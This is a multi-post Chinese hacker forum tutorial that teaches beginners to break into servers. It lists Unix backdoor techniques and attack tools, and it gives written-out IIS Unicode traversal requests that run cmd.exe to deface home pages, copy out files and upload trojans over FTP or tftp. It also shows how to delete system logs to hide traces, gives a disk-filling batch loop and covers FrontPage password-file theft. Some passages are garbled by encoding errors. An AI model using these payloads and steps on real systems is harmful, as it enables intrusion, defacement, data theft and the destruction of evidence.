<DIV class=tpc_content id=read_489>黑客初級技術(shù)講解（下）<BR><BR><BR>　　&lt;4&gt;Login后門 <BR>　　在Unix里，login程序通常用來對telnet來的用戶進行口令驗證. 入侵者獲取login.c的 原代碼并修改，使它在比較輸入口令與存儲口令時先檢查后門口令。如果用戶敲入后門 口令，它將忽視管理員設(shè)置的口令讓你長驅(qū)直入。這將允許入侵者進入任何帳號，甚至 是root。由于后門口令是在用戶真實登錄并被日志記錄到utmp和wtmp前產(chǎn)生一個訪問 的，所以入侵者可以登錄獲取shell卻不會暴露該帳號。管理員注意到這種后門后，便 用"strings"命令搜索login程序以尋找文本信息. 許多情況下后門口令會原形畢露。入侵者就開始加密或者更好的隱藏口令，使strings命令失效&lt;5&gt;Telnetd后門 <BR>　　當(dāng)用戶telnet到系統(tǒng)，監(jiān)聽端口的inetd服務(wù)接受連接隨后遞給in.telnetd，由它運行 login.一些入侵者知道管理員會檢查login是否被修改，就著手修改in.telnetd. 在in.telnetd內(nèi)部有一些對用戶信息的檢驗，比如用戶使用了何種終端. 典型的終端 設(shè)置是Xterm或者VT100.入侵者可以做這樣的后門，當(dāng)終端設(shè)置為"letmein"時產(chǎn)生一 個不要任何驗證的shell. 入侵者已對某些服務(wù)作了后門，對來自特定源端口的連接產(chǎn) 生一個shell。 <BR><BR>　　&lt;6&gt;服務(wù)后門 <BR>　　幾乎所有網(wǎng)絡(luò)服務(wù)曾被入侵者作過后門. Finger，rsh，rexec，rlogin，ftp，甚至 inetd等等的作了的版本隨處多是。有的只是連接到某個TCP端口的shell，通過后門口令就能獲取訪問。這些程序有時用刺媧□？Ucp這樣不用的服務(wù)，或者被加入inetd.conf 作為一個新的服務(wù)，管理員應(yīng)該非常注意那些服務(wù)正在運行，并用MD5對原服務(wù)程序做校驗。 <BR><BR>　　&lt;7&gt;Cronjob后門 <BR>　　Unix上的Cronjob可以按時間表調(diào)度特定程序的運行。入侵者可以加入后門shell程序 使它在1AM到2AM之間運行，那么每晚有一個小時可以獲得訪問。也可以查看cronjob中 經(jīng)常運行的合法程序，同時置入后門。 <BR><BR>　　&lt;8&gt;庫后門 <BR>　　幾乎所有的UNIX系統(tǒng)使用共享庫，共享庫用于相同函數(shù)的重用而減少代碼長度。一些入侵者在象crypt.c和_crypt.c這些函數(shù)里作了后門；象login.c這樣的程序調(diào)用了 crypt()。當(dāng)使用后門口令時產(chǎn)生一個shell。 因此，即使管理員用MD5檢查login程序，仍然能產(chǎn)生一個后門函數(shù)，而且許多管理員并不會檢查庫是否被做了后門。對于許多入侵者來說有一個問題: 一些管理員對所有東西多作了MD5校驗，有一種辦法是入侵者對open()和文件訪問函數(shù)做后門。后門函數(shù)讀原文件但執(zhí)行trojan后門程序。所以 當(dāng)MD5讀這些文件時，校驗和一切正常，但當(dāng)系統(tǒng)運行時將執(zhí)行trojan版本的，即使trojan庫本身也可躲過MD5校驗，對于管理員來說有一種方法可以找到后門，就是靜態(tài)編連MD5校驗程序然后運行，靜態(tài)連接程序不會使用trojan共享庫。 <BR><BR>　　&lt;9&gt;內(nèi)核后門 <BR>　　內(nèi)核是Unix工作的核心，用于庫躲過MD5校驗的方法同樣適用于內(nèi)核級別，甚至連靜態(tài) 連接多不能識別. 一個后門作的很好的內(nèi)核是最難被管理員查找的，所幸的是內(nèi)核的 后門程序還不是隨手可得，每人知道它事實上傳播有多廣。 <BR><BR>　&lt;10&gt;文件系統(tǒng)后門 <BR>　　入侵者需要在服務(wù)器上存儲他們的掠奪品或數(shù)據(jù)，并不能被管理員發(fā)現(xiàn)，入侵者的文章常是包括exploit腳本工具，后門集，sniffer日志，email的備分，原代碼，等等！有時為了防止管理員發(fā)現(xiàn)這么大的文件，入侵者需要修補"ls"，"du"，"fsck"以隱匿特定的目錄和文件，在很低的級別，入侵者做這樣的漏洞: 以專有的格式在硬盤上割出一部分，且表示為壞的扇區(qū)。因此入侵者只能用特別的工具訪問這些隱藏的文件，對于普通的管理員來說，很難發(fā)現(xiàn)這些"壞扇區(qū)"里的文件系統(tǒng)，而它又確實存在。 <BR><BR>　　&lt;11&gt;Boot塊后門 <BR>　　在PC世界里，許多病毒藏匿與根區(qū)，而殺病毒軟件就是檢查根區(qū)是否被改變。Unix下，多數(shù)管理員沒有檢查根區(qū)的軟件，所以一些入侵者將一些后門留在根區(qū)。 <BR>. 所以更多的管理員是 用MD5校驗和檢測這種后門的。 <BR>&lt;12&gt;隱匿進程后門 <BR>　　入侵者通常想隱匿他們運行的程序，這樣的程序一般是口令破解程序和監(jiān)聽程序 (sniffer)，有許多辦法可以實現(xiàn)，這里是較通用的: 編寫程序時修改自己的argv[] 使它看起來象其他進程名?？梢詫niffer程序改名類似in.syslog再執(zhí)行，因此 當(dāng)管理員用"ps"檢查運行進程時，出現(xiàn) 的是標準服務(wù)名?？梢孕薷膸旌瘮?shù)致使 "ps"不能顯示所有進程，可以將一個后門或程序嵌入中斷驅(qū)動程序使它不會在進程表顯現(xiàn)。使用這個技術(shù)的一個后門例子是 <BR><BR>　　amod.tar.gz : <BR>　　<A href="http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html" target=_blank><FONT color=#2f5fa1>http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html</FONT></A>網(wǎng)絡(luò)通行. 這些網(wǎng)絡(luò)通行后 門有時允許入侵者通過防火墻進行訪問。有許多網(wǎng)絡(luò)后門程序允許入侵者建立某個端 口號并不用通過普通服務(wù)就能實現(xiàn)訪問. 因為這是通過非標準網(wǎng)絡(luò)端口的通行，管理 員可能忽視入侵者的足跡. 這種后門通常使用TCP，UDP和ICMP，但也可能是其他類型報文。 <BR><BR>　　&lt;14&gt;TCP Shell 后門 <BR>　　入侵者可能在防火墻沒有阻塞的高位TCP端口建立這些TCP Shell后門. 許多情況下，他 們用口令進行保護以免管理員連接上后立即看到是shell訪問. 管理員可以用netstat 命令查看當(dāng)前的連接狀態(tài)，那些端口在偵聽，目前連接的來龍去脈. 通常這些后門可 以讓入侵者躲過TCP Wrapper技術(shù). 這些后門可以放在SMTP端口，許多防火墻允許 e-mail通行的. <BR><BR>　　&lt;15&gt;UDP Shell 后門 <BR>　　管理員經(jīng)常注意TCP連接并觀察其怪異情況，而UDP Shell后門沒有這樣的連接，所以 netstat不能顯示入侵者的訪問痕跡，許多防火墻設(shè)置成允許類似DNS的UDP報文的通行，通常入侵者將UDP Shell放置在這個端口，允許穿越防火墻。 <BR><BR>　　&lt;16&gt;ICMP Shell 后門 <BR>　　Ping是通過發(fā)送和接受ICMP包檢測機器活動狀態(tài)的通用辦法之一。許多防火墻允許外界ping它內(nèi)部的機器，入侵者可以放數(shù)據(jù)入Ping的ICMP包，在ping的機器間形成一個shell通道，管理員也許會注意到Ping包暴風(fēng)，但除了他查看包內(nèi)數(shù)據(jù)，否者入侵者不會暴露。 <BR><BR>　　&lt;17&gt;加密連接 <BR>　　管理員可能建立一個sniffer試圖某個訪問的數(shù)據(jù)，但當(dāng)入侵者給網(wǎng)絡(luò)通行后門加密 后，就不可能被判定兩臺機器間的傳輸內(nèi)容了。</DIV>

<DIV class=tpc_content id=read_490>基礎(chǔ)知識（1）<BR><BR><BR>我認為這是一套適合初學(xué)者由淺到深的文章，所以強烈推薦給大家，作者從基礎(chǔ)講到最近比較火的漏洞，可能有些人看來是淺了些，但是的確很適合想干點啥但又不知道怎么辦的菜鳥們 。<BR><BR>第一節(jié)，伸展運動。這節(jié)操我們要準備道具，俗話說：“工欲善其事，必先利其器”（是這樣嗎？哎！文化低……）說得有道理，我們要學(xué)習(xí)黑客技術(shù)，一點必要的工具必不可少。 <BR><BR>1，一臺屬于自己的可以上網(wǎng)的電腦。這樣你可以有充分的支配權(quán)，上網(wǎng)不用說，否則你怎么看到我的文章？wap?呵呵！屬于自己很重要，否則安全性是個很大的問題。第一點相信大家沒有問題。 <BR><BR>2，windows2000/nt,別和我說98/me,他們是你們同學(xué)用來玩游戲的?。ó?dāng)然，我也是鐵桿game fan)對網(wǎng)絡(luò)支持極差，命令受限制，很多軟件又不能用，對黑客來說使用起來絆手絆腳，非常不利。這里我推薦2000，這是一個很成熟的系統(tǒng)（漏洞還是有一堆）。推薦雙系統(tǒng)，這樣黑玩搭配，干活不累。 <BR><BR>3，冰河。中國第一木馬，中者數(shù)不勝數(shù)，國人驕傲。雖然用冰河根本不能算黑客，但它確實能培養(yǎng)你對黑客的興趣，同時幫助你了解網(wǎng)絡(luò)，相信很多黑客同學(xué)都是這樣起步的。靜止寫的那篇冰河教程很不錯，大家仔細看看。而且，以后你學(xué)會入侵服務(wù)器后，用冰河操作也會減少工作量（我是懶蟲，爽?。?<BR><BR>4，oicq。我們學(xué)黑客，可不是學(xué)泡mm!bfctx你………… 息怒息怒！我們當(dāng)然是學(xué)黑客，但不要忘了，眾人拾柴火更高，我們通過cshu的成員列表，互相聯(lián)系幫助，對提高水平很有幫助！另外我要廢話一句：據(jù)我了解，現(xiàn)在黑客網(wǎng)站下載最多的都是針對oicq的破解工具，我個人認為很無聊，偷個密碼代表什么，浪費時間！最后補充：mm不能不泡。（誰砸我？？?。。?<BR><BR>5，superscan。很好用的端口掃描器，速度超快，功能一流，一旦擁有，別無所求……（打?。。┎徽撌钦夷抉R受害者，還是掃服務(wù)器端口，它都非常有效，cshu強烈推薦！ <BR><BR>6，一本筆記本/便條，網(wǎng)上資料相當(dāng)多，黑客處理的也是非常之多。良好的習(xí)慣決定了你的效率，準備一本筆記本，記錄下你的成果，肉雞，木馬利用，命令，密碼……堅持一下，你會發(fā)現(xiàn)你的效率大幅上升的！ <BR><BR>7，lc3.著名nt/2000sam破解程序，有時我們拿不到足夠權(quán)限，又沒好辦法，那么lc3是最好的解決辦法，只要你拿的到sam，你就是服務(wù)器它爺爺！本站有其破解程序，支持了暴力破解！ <BR><BR>8，程序合并。這是玩木馬必需的，雖然木馬是很低的手段，但有時配合巧辦法（以后我會介紹）確實能夠達到意想不到的效果，朋友們可以在空閑時玩玩木馬，很有趣，若你能巧妙的騙過mm,那么webmaster也可能被你騙倒：〉 （比較理想化） <BR><BR>9，流光4for 2000/nt?？赡苁鞘澜缟献詈玫木C合類黑軟！中國的驕傲，它集成了很全的漏洞信息，速度快，方法多，對有漏洞的主機是毀滅性的打擊，操作又方便，是快速黑站必不可少的精品工具。超級吐血推薦?。?<BR><BR>10，良好的心態(tài)，穩(wěn)定的情緒，刻苦鉆研的精神，刨根問底的作風(fēng)，打掃房間的習(xí)慣。黑客是門很高深的學(xué)問，不要幻想一步登天，失敗是常有的事，千萬不可灰心。在那么多黑軟的包圍下，切不可完全依賴他們，一定要了解它們利用什么原理工作。對任何一個小問題，小細節(jié)，一定要問清楚，cshu就是給大家互相交流的場所哦！黑完后不要得意忘形，打掃戰(zhàn)場也很重要，以防萬一。 <BR><BR>第一節(jié)操完，可能很無聊，我就這點水平，大家見諒！這里我說一句大話：做完菜鳥操，包你會黑簡單的站（哎喲！心慌了！） <BR><BR>下一節(jié)操我們要介紹如何掌握一臺主機的基本信息，期待中…… <BR><BR>真是太對不起大家了，隔了那么久才寫這篇教程，我這幾天實在太忙，大家還是體諒一下我吧，好了，開始做操。 <BR><BR>今天的內(nèi)容是獲得主機的信息。 我們要黑一臺主機，首先要了解它的信息，包括它的類型，用戶列表，目錄，端口，漏洞等等。 <BR><BR>首先我們我們要找一臺主機來練手，隨便挑吧！<A href="http://www.flyingfish.com/" target=_blank><FONT color=#2f5fa1>www.flyingfish.com</FONT></A>(亂說的) <BR><BR>第一部，呵呵，先在ie里看看吧，mmmm.....做的還行，挺精致的！主要是我們肯定了它現(xiàn)在是正常的。 然后，我們應(yīng)該知道它的ip,很簡單，ping它一下就可以了。 <BR><BR>ping <A href="http://www.flyingfish.com/" target=_blank><FONT color=#2f5fa1>www.flyingfish.com</FONT></A>，看看窗口里有了什么？是不是有三行回應(yīng)，其中的111.111.222.222就是ip了（還是胡說的，一個例子）。有人是不是要問，我這里怎么沒有。那可能是兩個原因，第一，你打錯命令了；第二，該主機裝了防火墻，禁止ping,不過這種可能很小。 <BR><BR>知道了ip，下一步應(yīng)該確定端口了。下面是一些常用的端口的默認值 <BR><BR>21--ftp 重要哦 <BR><BR>23--telnet 歡呼吧 <BR><BR>25-smtp 盡管重要，但似乎沒什么可利用的 <BR><BR>53--domain 同上 <BR><BR>79--finger 可知道用戶信息了 <BR><BR>80--http 要看網(wǎng)頁，沒它不行吧 <BR><BR>110--pop 收信的 <BR><BR>139--netbios 共享用的，很有利用價值哦 <BR><BR>3389--win2000超級終端 呵呵，這個好！ <BR><BR>其實端口有上千種，這些最最常用 <BR><BR>我們怎么知道服務(wù)器有什么端口打開呢？？去找個掃描器吧，x-scan ,super scan,flux等等很多哦。這里我推薦super scan ，速度很快，本站也有其教程哦！用法還是比較傻瓜的，估計大家不會有問題，輕輕幾點，打開的端口就出現(xiàn)了。不錯不錯，上面說到的都有（太理想化了吧!） <BR><BR>那么我們該如何應(yīng)對呢？ <BR><BR>ps:忘了說一聲，順便掃一下7626,冰河有也說不準哦：） <BR><BR>若有ftp,那就用用匿名登陸。自己動手也行，最好用x-scan flux等吧！反正，有ftp就有一份希望 <BR><BR>telnet在！好!telnet 111.111.222.222，出現(xiàn)窗口了吧！嗯？要密碼？看來網(wǎng)管還不是超級注意文明用語：）隨便猜個，錯了，閃人！ <BR><BR>smtp,看著它，無奈 <BR><BR>domain，一般它帶了局域網(wǎng)了 <BR><BR>finger 可以知道用戶列表了，不好，忘了用法了，幸好finger很少出現(xiàn) <BR><BR>80肯定在，我們等會來對付它 <BR><BR>110 有smtp，pop在也不奇怪了 <BR><BR>139 找個掃描器來找找有沒有露在外面的共享吧，日后也用得著 <BR><BR>3389 太太太好了！！打開客戶端吧，用輸入法漏洞試試，成了就干了它！不成也沒事，我們以后完全控制它3389會很方便的。 <BR><BR>端口掃完了！我們在多了解它一點吧！追捕大家都知道吧，其實用它獲取主機信息也不賴哦。打開追捕，輸入ip,選擇智能追捕，是不是有很多信息出來了？雖然不能直接利用，但畢竟我們有對它有了進一步的了解。 <BR><BR>掌握了那么多信息，我們該做點什么了，一般黑客入侵都是靠著系統(tǒng)漏洞，不會都傻傻地去暴力破解的。我們現(xiàn)在就要看看它有什么漏洞。 <BR><BR>對漏洞大家可能不太了解，我這里也不能一一說明了，太多了，感興趣的話去論壇找freedom吧！ <BR><BR>目前廣泛利用和存在的漏洞有：unicode,unicode后續(xù)，iis溢出，.idq,.frontpage extend,輸入法漏洞等等大漏洞。 至于如何確定，呵呵，絕對不會是一行一行地在ie中試吧，拿出x-scan吧，很好的掃描器哦！ <BR><BR>稍微設(shè)置一下就上路吧！過了一會，呵呵，報告出來了，快看，哇！漏洞一大堆！這下賺了！各條漏洞都有詳細的信息，大家看吧，總比我說的準了。 <BR><BR>現(xiàn)在這臺主機已經(jīng)和我們成為親戚了，要讓這位親愛的親戚做點事，就要開始各種攻擊了，下回我們就探討一下最最可愛的unicode漏洞，各位可能就會在unicode中完成第一次黑客體驗，再見：）</DIV>

<DIV class=tpc_content id=read_491>基礎(chǔ)知識（2）<BR><BR><BR>今天我們談?wù)剈nicode漏洞，這可是基礎(chǔ)中的基礎(chǔ)，重點里的重點，不懂的一定要好好學(xué)。 <BR><BR>2000年10月17日中聯(lián)綠盟發(fā)布了以下的安全公告： <BR><BR>微軟IIS 4.0 / 5.0 擴展UNICODE目錄遍歷漏洞 <BR><BR>遠程漏洞：是 <BR><BR>本地漏洞：是 <BR><BR>發(fā)布日期：2000年10月17日 <BR><BR>更新日期：2000年10月17日 <BR><BR>受影響的版本： <BR><BR>Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0 <BR><BR>這可是中國乃至全球網(wǎng)絡(luò)安全界的一次大變節(jié)，入侵nt/2000系統(tǒng)變得如此簡單，不打補丁的死路一條。<BR><BR>下面開始正式學(xué)習(xí)： <BR><BR>一，UNICODE漏洞的原理 <BR><BR>此漏洞從中文IIS4.0+SP6開始，還影響中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1， 中國臺灣繁體中文也同樣存在這樣的漏洞。 <BR><BR>中文版的WIN2000中，UNICODE編碼 存在BUG，在UNICODE 編碼中 <BR><BR>%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/' <BR><BR>%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\' <BR><BR>在NT4中/編碼為%c1%9c <BR><BR>在英文版里： WIN2000英文版%c0%af <BR><BR>在中文win2k里：%c1%1c <BR><BR>此外還有多種編碼，不一一闡述。 <BR><BR>本文例子均以win2k為準，其他類型請自行替換。<BR><BR>基礎(chǔ)知識（3）<BR><BR><BR>二，一切從基礎(chǔ)開始 <BR><BR>由于winnt\system32\cmd.exe的存在，使遠程執(zhí)行命令變?yōu)榭赡?，在瀏覽器里輸入以下請求：(假設(shè)11.11.22.22有漏洞） <BR><BR>11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir <BR><BR>學(xué)過dos的應(yīng)該可以看懂，其實就是利用當(dāng)中的非法請求使我們可以連到system32下，如果inetpub\目錄不合winnt同盤，或者目錄級數(shù)有改動，可能會引起請求失敗。 <BR><BR>如果成功，那么在瀏覽區(qū)可看到如下信息： <BR><BR>Directory of C:\inetpub\scripts <BR><BR>2000-09-28 15:49 〈DIR〉 . <BR><BR>2000-09-28 15:49 〈DIR〉 .. （假設(shè)目錄中沒有文件，實際上有一大堆） <BR><BR>是不是有自己機器的感覺了，正點！就是這種感覺！ <BR><BR>cmd.exe相當(dāng)與dos里的command.com，因此，我們可以執(zhí)行很多命令了！ <BR><BR><A href="http://11.11.22.22/msadc/..%c1%1" target=_blank><FONT color=#2f5fa1>http://11.11.22.22/msadc/..%c1%1</FONT></A> ... em32/cmd.exe?/c+dir （這個命令同樣道理） <BR><BR>大家請注意：/c后面的+，實際上，他就是空格，請記牢！dir開始就是dos命令了，我們可以更改一下： <BR><BR>11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe <BR><BR>會dos的朋友一定懂其意義了，不懂的請去看書 . <BR><BR>不用說，大家也知道我們就可以利用它來對有漏洞的機器展開攻擊了！ <BR><BR>三，實戰(zhàn)演練 <BR><BR>1，修改主頁?。ㄊ遣皇呛芩?？） <BR><BR>一般主頁位置在c:\inetpub\wwwroot下，但要是改了路徑，就需要找找了。 <BR><BR>最方便的方法：在瀏覽器里輸入 <A href="http://11.11.22.22/.ida" target=_blank><FONT color=#2f5fa1>http://11.11.22.22/.ida</FONT></A>要是有漏洞，那在瀏?..皇俏頤塹氖籽　?/a&gt; <BR><BR>分析法：用dir看各個盤符的根目錄，看可疑的就進去看，運氣好的在一分鐘里找到，這要看運氣和直覺。 <BR><BR>dir/s法：首先在看其主頁，找個圖片或連接，看它的文件名，比如，11.11.22.22首頁上有一幅圖片，右擊，屬性，看到了嗎？iloveu.gif，然后我們利用unicode輸入這條命令dir c:\iloveu.gif /s意味著查找c盤下所有目錄里的iloveu.gif，注意實際應(yīng)用時別忘了把空格改為+,如果沒有繼續(xù)找d盤，很快就能確定主頁目錄的。 <BR><BR>找到了目錄，就要對它開刀了！一般默認收頁為index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一個，現(xiàn)在我們確定11.11.22.22中為index.htm <BR><BR>那么我們就修改它吧！ <BR><BR>最方便的方法：echo法。echo是一個系統(tǒng)命令，主要用于設(shè)置回應(yīng)開關(guān)，而echo cshu &gt;c:\autoexe.bat就是把cshu加入autoexec.bat里并刪除原有內(nèi)容，echo cshunice &gt;&gt;c:\autoexec.bat就是加入cshunice但不刪除原有內(nèi)容，這樣我們就可以逍遙的改了。 <BR><BR>11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+&gt;c:\inetpub\wwwroot\index.htm <BR><BR>回應(yīng)為：HTTP 500 - 內(nèi)部服務(wù)器錯誤 <BR><BR>通過對cmd的分析，袁哥得出一條簡便的方法，加入"符號 <BR><BR>11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+hackedbycshu+&gt;c:\inetpub\wwwroot\index.htm <BR><BR>11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+2001730+&gt;&gt;c:\inetpub\wwwroot\index.htm <BR><BR>回應(yīng)為：cgi錯誤，不用理會 <BR><BR>兩條命令一下，呵呵，再看看11.11.22.22，是不是烙上我們的大名了？不錯吧 <BR><BR>而在實際操作中，可能袁哥的方法也會失效，這時，我們就可以copy cmd.exe 為另一個exe，記住路徑，用copy后的來echo <BR><BR>例如：11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe <BR><BR>11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+&gt;c:\inetpub\wwwroot\index.htm <BR><BR>2,上傳法：echo有點不講道理，把人家的文件破壞了，要是想在主頁上增光添彩，那就應(yīng)該用改好的主頁</DIV>

<DIV class=tpc_content id=read_493>基礎(chǔ)知識（4）<BR><BR><BR>上傳，這個我們后面介紹。 <BR><BR>幾點忠告： <BR><BR>1，對于沒有主頁的機器（就是正在建立的主頁），不要改它，這很沒水準，也很沒道德 <BR><BR>2，echo前記得幫他們做好備份 <BR><BR>3，不準在主頁里加入惡性語句 <BR><BR>2，下載文件 <BR><BR>要是有什么有用的文件被你發(fā)現(xiàn)，那我們?nèi)绾蜗螺d呢？ <BR><BR>最簡單的方法：把文件copy至網(wǎng)頁目錄下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然后，下載11.11.22.22/baby.zip就行了，注意！實際應(yīng)用中要記得對文件名進行修改，總之不能暴露。 <BR><BR>別的方法：對不起，沒想好：） <BR><BR>3，最重要的上傳 <BR><BR>一般方法：ftp法 <BR><BR>首先建一個ftp腳本文件：c:\hehe.haha（名字亂取把），申請一個ftp賬號，然后用echo吧 <BR><BR>echo+open ftp.cshu.com（ftp主機） &gt; c:\hehe.haha <BR><BR>echo+user yourname &gt;&gt; cc:\hehe.haha (yourname是用戶名) <BR><BR>echo+yourpasswd &gt;&gt; c:\hehe.haha (yourpasswd是密碼) <BR><BR>echo+get setup.exe &gt;&gt; c:\hehe.haha 要下載的文件 <BR><BR>echo+quit &gt;&gt; c:\hehe.haha <BR><BR>完了以后：ftp+/s:c:\hehe.haha,由于是ftp主機，那么速度一定很快，過一會setup.exe就會出現(xiàn)在當(dāng)前目錄了（也就是cmd所在目錄） <BR><BR>別忘了先上傳到ftp主機，不要做馬大哈哦！ <BR><BR>最簡單的方法：tftp法。 <BR><BR>這種方法不用中轉(zhuǎn)服務(wù)器，首先準備一個tftp服務(wù)端，它的作用就是把你的機器做成一個tftp服務(wù)器，利用漏洞機器來下載（注意，運行tftp時不要運行其他的ftp軟件） <BR><BR>在這里我推薦cisco tftp server，自己去找找把，實在沒有來找我：） <BR><BR>安裝好后運行，別忘了設(shè)置好默認目錄，否則會找不到文件 <BR><BR>tftp命令：tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe（ihateu.exe在默認目錄里） <BR><BR>1.2.3.4為你的ip，用unicode運行一下，會看到tftp server里有反應(yīng)了，這就好了，不一會，文件就傳上去了，方便把！ <BR><BR>學(xué)會了上傳，我們就可以好好改主頁，還可以上傳木馬，還可以把程序放上去運行…………（運行程序和在dos里一樣） <BR><BR>4，如何清除痕跡 <BR><BR>雖然國內(nèi)主機紀錄ip的不是很多，但萬事小心為妙，unicode權(quán)限達不到admin。用cleaniislog行不通，就…………直接刪吧！ <BR><BR>C:\winnt\system32\logfiles\*.* <BR><BR>C:\winnt\ssytem32\config\*.evt <BR><BR>C:\winnt\system32\dtclog\*.* <BR><BR>C:\winnt\system32\*.log <BR><BR>C:\winnt\system32\*.txt <BR><BR>C:\winnt\*.txt <BR><BR>C:\winnt\*.log <BR><BR>全……擦掉！ <BR><BR>四，細節(jié)問題。 <BR><BR>1，遇到長文件名怎么辦？ <BR><BR>c:\program files\ <BR><BR>就用c:\"program20%files"\ <BR><BR>2，遇到空格怎么辦？<BR>%代替嘍，或者xx yy=xxyy~1 <BR>基礎(chǔ)知識（5）<BR><BR><BR>%代替嘍，或者xx yy=xxyy~1 <BR><BR>3,如何做個很大的文件？ <BR><BR>目的就是破壞啦！我不喜歡不過教教你們啦 <BR><BR>@echo off <BR><BR>echo big &gt; c:\a.a <BR><BR>:h <BR><BR>copy c:\a.a+c:\a.a c:\a.a <BR><BR>goto h <BR><BR>注意不要亂來啊！ <BR><BR>4，輸入命令，沒反應(yīng)或反應(yīng)不對。 <BR><BR>：）請檢查檢查再檢查命令的正確性，可能沒有漏洞，那就閃人！看在你看到這里那么給我面子的份上，在給你幾個吧！ <BR><BR><A href="http://www.exsample.com/scripts/" target=_blank><FONT color=#2f5fa1>http://www.exsample.com/scripts/</FONT></A> ... macr;..&Agrave; <BR>&macr;../winnt/system32/cmd.exe?/c+dir+c :\ 或 <A href="http://www.exsample.com/" target=_blank><FONT color=#2f5fa1>http://www.exsample.com/msadc/..</FONT></A> ... 2/cmd.exe?/c+dir+c:\ 或 <A href="http://www.exsample.com/_vti_bin" target=_blank><FONT color=#2f5fa1>http://www.exsample.com/_vti_bin</FONT></A> ... 2/cmd.exe?/c+dir+c:\ 或 <A href="http://www.exsample.com/_mem_bin" target=_blank><FONT color=#2f5fa1>http://www.exsample.com/_mem_bin</FONT></A> ... 2/cmd.exe?/c+dir+c:\ <BR><BR>不一定有用哦！ <BR><BR>5，如何找到unicode漏洞的主機 <BR><BR>呵呵：）最好的方法自然是………………一個一個ping,一個一個試嘍：） <BR><BR>不要打我呀！我說我說。最好找一個cgi掃描器，unicode查找器多如牛毛，隨便找個吧！ <BR><BR>6，我copy，del文件，怎么顯示aceess denined? <BR><BR>這個不好辦了，由于unicode所擁有的權(quán)限有限，出現(xiàn)上述情況很正常，我們要做的便是提高自己的權(quán)限！ <BR><BR>這個我會在今后介紹，現(xiàn)在你可以試試attrib <BR><BR>attrib -r -h -s c:\autoexec.bat <BR><BR>再對autoexec.bat進行操作，看看有沒有效果，成功率不高，不好意思！ <BR><BR>7，我黑了主頁，天下無敵？ <BR><BR>我本來想對你說：“見你的鬼去吧！”不過想想不大禮貌，有失我紳士風(fēng)度，所以改個口 <BR><BR>echo主頁或改主頁在不懂黑客的人看起來很了不起，不過，它最多算是一個基礎(chǔ)，拿到admin才是我們的終極目標！ <BR><BR>對cshu全體成員來說，不準去改正在建立的網(wǎng)頁！這是我們的原則！ <BR><BR>要是你想耍耍威風(fēng)，那也可以理解，那就去黑外國的，或者url欺騙也是個好選擇 <BR><BR>8，我如何做更多的事？ <BR><BR>第一，努力提高權(quán)限 <BR><BR>第二，由于cmd的限制，我們可以做的不多，那就要程序幫忙，上傳吧！切記，要隱秘！ <BR><BR><BR>一，frontpage擴展攻擊。 <BR><BR>為什么把它放第一位呢？原因很簡單，它最最方便，frontpage服務(wù)器擴展是一種方便的遠程站點管理功能，可是由于某些網(wǎng)管注意文明用語的疏忽（為什么注意文明用語滿街飛？）不設(shè)置訪問密碼，如果那樣的話，我們只要用一個frontpage就可以黑它了??！這完全不是黑客工具，但它確實辦到了，還要感謝注意文明用語網(wǎng)管和微軟啊！ <BR><BR>具體做法： <BR><BR>1，準備frontpage，我是用dreamweaver的，但它不能黑?。海┳詈檬?000版，只是不要是老掉牙的版本就行了。 <BR><BR>2，找一臺有frontpage擴展的主機，可以用流光，也可以用搜索引擎查找/_vti_pvt/，這是frontpage擴展的標志。 <BR><BR>3，接下來打開frontpage,(媽媽：你在干什么？回答：做網(wǎng)頁！媽媽：好孩子?。┪募藛蜗逻x擇“打開站點”，然后在文件夾框里寫入 <A href="http://11.11.22.22/" target=_blank><FONT color=#2f5fa1>http://11.11.22.22</FONT></A>（我習(xí)慣用這個做例子，以...僮魍?澄募?恕?/a&gt; <BR><BR>4，萬一跳出錯誤信息，表示有密碼（這個不算注意文明用語）這時我們試著用以下url, <A href="http://11.11.22.22/_vti_pvt/service.pwd" target=_blank><FONT color=#2f5fa1>http://11.11.22.22/_vti_pvt/service.pwd</FONT></A>,這...盎箍梢愿耐?場?/a&gt; <BR><BR>我的看法： <BR><BR>這個漏洞只能說明網(wǎng)管的疏忽，對我們而言是沒有什么利用價值的，只可以改改網(wǎng)頁，也許這也夠了，但要進一步控制主機，此漏洞就無能為力。消遣時可以玩玩。 <BR><BR>二，iis.printer溢出攻擊 <BR><BR>據(jù)說緩沖區(qū)溢出攻擊是黑客入侵時70%所選的方法，看起來有點夸張，但確實有道理，因為暴力密碼破解在網(wǎng)絡(luò)上變得非常之慢，而像unicode的解碼漏洞所取得的權(quán)限又太低，而緩沖區(qū)溢出一般可取得system權(quán)限，是非常有用的！ 